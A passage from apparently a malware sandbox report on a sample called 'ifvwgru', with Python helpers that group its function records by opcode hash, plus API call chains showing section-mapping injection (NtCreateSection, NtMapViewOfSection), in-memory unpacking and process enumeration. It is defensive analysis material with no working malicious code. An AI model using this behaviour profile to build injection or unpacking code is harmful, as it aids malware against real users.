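    FunctionRecord(0x02F21000, 0x02F22434,
                   "af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d",
                   "b61b1a19a0d1122c38a0cb15e3304c09cdeb41e5acb571377820d73b109d2262",
                   ("DeleteFileW", "DeleteFileW", "SleepEx", "RtlExitUserThread")),
    # Process-list polling loop
    FunctionRecord(0x08751000, 0x08753D1C,
                   "39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f",
                   "ffb036a2c8ac557ee8da5ac5e6d5c249f66934cc7ad775dd5f7e0c4d2a4111e1",
                   ("CreateToolhelp32Snapshot", "Process32First", "Process32Next",
                    "FindCloseChangeNotification", "SleepEx")),
    FunctionRecord(0x02F21000, 0x02F23D1C,
                   "39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f",
                   "62e0a7a736a0b92164ef79647558614512471a9c47f75cbaa36e6e08760b15aa",
                   ("CreateToolhelp32Snapshot", "SleepEx")),
]


def image_offset(rec: FunctionRecord) -> int:
    """Offset of the function inside its dump; equal across copies of one image."""
    return rec.start - rec.dump_base


def group_by_opcode(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    groups: Dict[str, List[FunctionRecord]] = defaultdict(list)
    for rec in records:
        groups[rec.opcode_id].append(rec)
    return dict(groups)


def merged_apis(group: List[FunctionRecord]) -> FrozenSet[str]:
    """Union of API names over all copies, with alias names folded."""
    return frozenset(API_ALIASES.get(name, name) for rec in group for name in rec.apis)


def rebase_deltas(group: List[FunctionRecord]) -> List[int]:
    """Distance of every other dump base from the lowest one in the group."""
    bases = sorted({rec.dump_base for rec in group})
    return [base - bases[0] for base in bases[1:]]


def summarize(records: List[FunctionRecord]) -> Dict[str, dict]:
    """One entry per Opcode ID: copy count, offset consistency, merged APIs."""
    summary = {}
    for opcode_id, group in group_by_opcode(records).items():
        offsets = {image_offset(rec) for rec in group}
        summary[opcode_id] = {
            "copies": len(group),
            "same_offset": len(offsets) == 1,
            "offset": min(offsets),
            "instruction_ids_differ": len({rec.instruction_id for rec in group}) == len(group),
            "apis": merged_apis(group),
        }
    return summary


if __name__ == "__main__":
    for opcode_id, info in summarize(RECORDS).items():
        print(opcode_id[:16], hex(info["offset"]), info["copies"], sorted(info["apis"]))
```

      Run stand-alone it prints one line per Opcode ID. On a full report the same idea applies: count distinct functions by Opcode ID, treat the union of per-dump API names as the function's import footprint, and use the Instruction ID only to match the same copy in another run that landed at the same base.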

      Execution Graph

      Execution Coverage:6.6%
      Dynamic/Decrypted Code Coverage:37.1%
      Signature Coverage:0%
      Total number of Nodes:89
      Total number of Limit Nodes:3
      • Graph not rendered; API call chains recovered from the graph data:
      • 00401561 -> 00401608 NtDuplicateObject -> 00401625 NtCreateSection -> 0040164B NtMapViewOfSection -> 0040166E NtMapViewOfSection -> 004016A5 NtCreateSection -> 004016DB NtMapViewOfSection -> 00401702 NtMapViewOfSection -> 00401729 (3 API calls)
      • 00403005 -> 0040302F -> 004030EA RtlCreateUserThread, NtTerminateProcess
      • 0040194A -> 00401991 Sleep -> 004019AC -> 00401553 (10 API calls)
      • 00402E07 -> 00402E1A -> 0040193E (11 API calls)
      • 00402EBA -> 00402ECC -> 0040193E -> 00401991 Sleep -> 00401553 -> NtDuplicateObject -> NtCreateSection -> NtMapViewOfSection (x2) -> NtCreateSection -> NtMapViewOfSection (x2) -> 00401729 -> 004016BE NtCreateSection -> 004016DB NtMapViewOfSection -> 00401702 NtMapViewOfSection
      • 02EC9AC0 -> 02ECA271 -> 02ECA295 CreateToolhelp32Snapshot -> 02ECA2B1 Module32First -> 02EC9F30 -> 02EC9F6C VirtualAlloc
      • 02C4092B GetPEB
      • 02C4003C -> 02C40E0F SetErrorMode, SetErrorMode -> 02C40D90 -> 02C40DBB GetPEB -> 02C40238 VirtualAlloc -> 02C402CE VirtualProtect -> 02C40439 VirtualFree -> 02C404BE LoadLibraryA

      Control-flow Graph (function at 401553; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
      • Opcode Fuzzy Hash: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66

      Control-flow Graph (function at 40156b; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
      • Opcode Fuzzy Hash: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25

      Control-flow Graph (function at 401561; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
      • Opcode Fuzzy Hash: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25

      Control-flow Graph (function at 40156f; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
      • Opcode Fuzzy Hash: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24

      Control-flow Graph (function at 401583; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
      • Opcode Fuzzy Hash: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64

      Control-flow Graph (function at 401587; rendered graph not reproduced)
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
      • Opcode Fuzzy Hash: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24

      Control-flow Graph (function at 401729; rendered graph not reproduced)
      APIs
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: Section$View$Create
      • String ID:
      • API String ID: 33071139-0
      • Opcode ID: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
      • Opcode Fuzzy Hash: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B

      Control-flow Graph (function at 403005; rendered graph not reproduced)
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateProcessTerminateThreadUser
      • String ID:
      • API String ID: 1921587553-0
      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction ID: 9349ae55c142a47270c9c73eabb89239111d3cd47c98212c67b606f4e0ccd907
      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction Fuzzy Hash: C5412531218E088FD7A8EF6CA88576377D5F798311F6643AAE809D3389EA34DC5187C5

      Control-flow Graph (function at 2c4003c; rendered graph not reproduced)
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C4024D
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2c40000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID: cess$kernel32.dll
      • API String ID: 4275171209-1230238691
      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction ID: 9c6c39d744e66da998234f7eafb144f198e58fe89f23fef007059eb5dcb8abaf
      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction Fuzzy Hash: 7D527974A01229DFDB64CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF15

      Control-flow Graph (function at 2eca271; rendered graph not reproduced)
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02ECA299
      • Module32First.KERNEL32(00000000,00000224), ref: 02ECA2B9
      Memory Dump Source
      • Source File: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EC3000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2ec3000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: ee703cd97d3473eed68c6dedf43a5d464c8be83eac8e7b8a023c0704afb73b18
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: A0F0C2322407246BD7202FF9A98CB7A72ECAF49628F30553DF64A911C0DB71E8064B61

      Control-flow Graph (function at 2c40e0f; rendered graph not reproduced)
      APIs
      • SetErrorMode.KERNELBASE(00000400,?,?,02C40223,?,?), ref: 02C40E19
      • SetErrorMode.KERNELBASE(00000000,?,?,02C40223,?,?), ref: 02C40E1E
      Memory Dump Source
      • Source File: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2c40000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: ErrorMode
      • String ID:
      • API String ID: 2340568224-0
      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction ID: 994b33df5fd358b2e7e35cf1cce9ee3a15b093092ac9ac22606117ff364d12c4
      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction Fuzzy Hash: 9AD0123114512877D7002A94DC09BCE7B1CDF05B66F008011FB0DD9080CB70964046E5

      Control-flow Graph (function at 40193e; rendered graph not reproduced)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
      • Opcode Fuzzy Hash: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B

      Control-flow Graph (function at 40194a; rendered graph not reproduced)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
      • Opcode Fuzzy Hash: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B

      Control-flow Graph (function at 40195c; rendered graph not reproduced)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
      • Opcode Fuzzy Hash: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B

      Control-flow Graph (function at 401973; rendered graph not reproduced)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
      • Opcode Fuzzy Hash: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
      • Opcode Fuzzy Hash: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EC9F81
      Memory Dump Source
      • Source File: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EC3000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_2ec3000_ifvwgru.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: df9fecf0ee99189606f59bc8d75ae11066e988aafdeb09114558cc656b72c058
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: D3112B79A40208EFDB01DF98CA85E98BBF5AF08351F1580A4F9489B362D371EA50DF90
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
      • Opcode Fuzzy Hash: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000006.00000002.2484567977.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_400000_ifvwgru.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
      • Opcode Fuzzy Hash: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B